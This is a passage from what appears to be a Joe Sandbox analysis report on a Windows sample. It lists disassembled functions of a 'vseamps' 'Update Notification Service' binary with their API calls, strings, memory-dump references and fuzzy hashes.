Instruction Fuzzy Hash: 2E41F02BB1AA0241FA53DB16A8B07BA2395BF05BF0F084535DD1E47386EF3CE4458309

Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 0000000140002A3C
RegQueryValueExW.ADVAPI32 ref: 0000000140002A76
RegCloseKey.ADVAPI32 ref: 0000000140002A96
EnterCriticalSection.KERNEL32 ref: 0000000140002AAB
LeaveCriticalSection.KERNEL32 ref: 0000000140002B31

Strings

action, xrefs: 0000000140002A52
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002A0D

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 1119674940-1966266597
Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00

Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004BE7
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004BF6
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C04
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C3E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C4D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C5B
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C8E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C9D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004CAB

GetComputerNameW.KERNEL32 ref: 0000000140001991
lstrlenW.KERNEL32 ref: 000000014000199C
GetProcessHeap.KERNEL32 ref: 00000001400019AB
HeapAlloc.KERNEL32 ref: 00000001400019B9

Strings

ampIfEp, xrefs: 000000014000195E
Security=impersonation static true, xrefs: 0000000140001952
ncalrpc, xrefs: 000000014000196D

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen$ComputerName
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3702919091-996641649
Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00

Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700

Function 00007FFDAC12712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FFDAC1272EB,?,?,?,00007FFDAC123EC0,?,?,?,?,00007FFDAC123CFD), ref: 00007FFDAC1271B1
GetLastError.KERNEL32(?,?,?,00007FFDAC1272EB,?,?,?,00007FFDAC123EC0,?,?,?,?,00007FFDAC123CFD), ref: 00007FFDAC1271BF
LoadLibraryExW.KERNEL32(?,?,?,00007FFDAC1272EB,?,?,?,00007FFDAC123EC0,?,?,?,?,00007FFDAC123CFD), ref: 00007FFDAC1271E9
FreeLibrary.KERNEL32(?,?,?,00007FFDAC1272EB,?,?,?,00007FFDAC123EC0,?,?,?,?,00007FFDAC123CFD), ref: 00007FFDAC127257
GetProcAddress.KERNEL32(?,?,?,00007FFDAC1272EB,?,?,?,00007FFDAC123EC0,?,?,?,?,00007FFDAC123CFD), ref: 00007FFDAC127263

Strings

api-ms-, xrefs: 00007FFDAC1271D1

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction ID: c32459856bed3e8a1ad1764c79f0982ac4ebd32905c210653ccbbbb95eb5a596
Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
Instruction Fuzzy Hash: 9531C36BB1BB42D1FE579B02E42067A62D4BF49BF0F590634ED2D06352EE3CE4458349

Function 00007FFDAC129444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFDAC129453
FlsGetValue.KERNEL32 ref: 00007FFDAC129468
FlsSetValue.KERNEL32 ref: 00007FFDAC129489
FlsSetValue.KERNEL32 ref: 00007FFDAC1294B6
FlsSetValue.KERNEL32 ref: 00007FFDAC1294C7
FlsSetValue.KERNEL32 ref: 00007FFDAC1294D8
SetLastError.KERNEL32 ref: 00007FFDAC1294F3

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction ID: 6eaa9b466ac1d7a1c2715013fa1e1918ea02bc1ed354492876e1785be51acdda
Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
Instruction Fuzzy Hash: 6921502AB0F68346FA5BA32556B523962829F447F4F544734D93E067C7EE2CE441820A

Function 00007FFDAC130100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFDAC130131
GetLastError.KERNEL32 ref: 00007FFDAC13013D
CloseHandle.KERNEL32 ref: 00007FFDAC130155
CreateFileW.KERNEL32 ref: 00007FFDAC130180
WriteConsoleW.KERNEL32 ref: 00007FFDAC13019F

Strings

CONOUT$, xrefs: 00007FFDAC130161

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction ID: bdc7e21076720cf0bb8f147053ba4bebf6cc39c1329d30dde70c3c16739330bd
Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
Instruction Fuzzy Hash: BB118423719E4182F7919B56F86432572A0FB88FF8F044234D96E47796CF7CD5548748

Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
CreateEventW.KERNEL32 ref: 00000001400012C0

Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3

SetServiceStatus.ADVAPI32 ref: 0000000140001302
WaitForSingleObject.KERNEL32 ref: 0000000140001312

Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6

SetServiceStatus.ADVAPI32 ref: 000000014000134B

Strings

vseamps, xrefs: 000000014000127B

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
String ID: vseamps
API String ID: 3197017603-3944098904
Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00

Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON

Download Yara Rule

APIs

sprintf_s.LIBCMTD ref: 0000000140001233
MessageBoxW.USER32 ref: 0000000140001249

Strings

usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy, xrefs: 000000014000121D
Help, xrefs: 0000000140001238
Jul 5 2019, xrefs: 0000000140001216
10:52:57, xrefs: 000000014000120F

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Messagesprintf_s
String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
API String ID: 2642950106-3610746849
Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700

Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002666
HeapFree.KERNEL32 ref: 0000000140002674
GetProcessHeap.KERNEL32 ref: 0000000140002683
HeapFree.KERNEL32 ref: 0000000140002691
GetProcessHeap.KERNEL32 ref: 00000001400026A0
HeapFree.KERNEL32 ref: 00000001400026AE
GetProcessHeap.KERNEL32 ref: 00000001400026BD
HeapFree.KERNEL32 ref: 00000001400026CB

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700

Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002986
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 0000000140002994
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029A3
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029B1
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029C0
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029CE
GetProcessHeap.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029DD
HeapFree.KERNEL32(?,?,?,0000000140002922), ref: 00000001400029EB

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200

Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 319667368-0
Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300

Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 1390108997-0
Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340

Function 00007FFDAC124CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFDAC124E72
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDAC12519B

Strings

csm, xrefs: 00007FFDAC124E99
csm, xrefs: 00007FFDAC124DB9
csm, xrefs: 00007FFDAC124E1B

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction ID: 0515192530fea2b23855d9803b2731a5d38ad316e5ffc5d277d7e73c897c36e0
Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
Instruction Fuzzy Hash: D0E1F53BB097828AEB129F28D4A03AD77A4FB457A8F504135DA8D17757CF38E481C706

Function 00007FFDAC1295BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFDAC128BC9,?,?,?,?,00007FFDAC128C14), ref: 00007FFDAC1295CB
FlsSetValue.KERNEL32(?,?,?,00007FFDAC128BC9,?,?,?,?,00007FFDAC128C14), ref: 00007FFDAC129601
FlsSetValue.KERNEL32(?,?,?,00007FFDAC128BC9,?,?,?,?,00007FFDAC128C14), ref: 00007FFDAC12962E
FlsSetValue.KERNEL32(?,?,?,00007FFDAC128BC9,?,?,?,?,00007FFDAC128C14), ref: 00007FFDAC12963F
FlsSetValue.KERNEL32(?,?,?,00007FFDAC128BC9,?,?,?,?,00007FFDAC128C14), ref: 00007FFDAC129650
SetLastError.KERNEL32(?,?,?,00007FFDAC128BC9,?,?,?,?,00007FFDAC128C14), ref: 00007FFDAC12966B

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

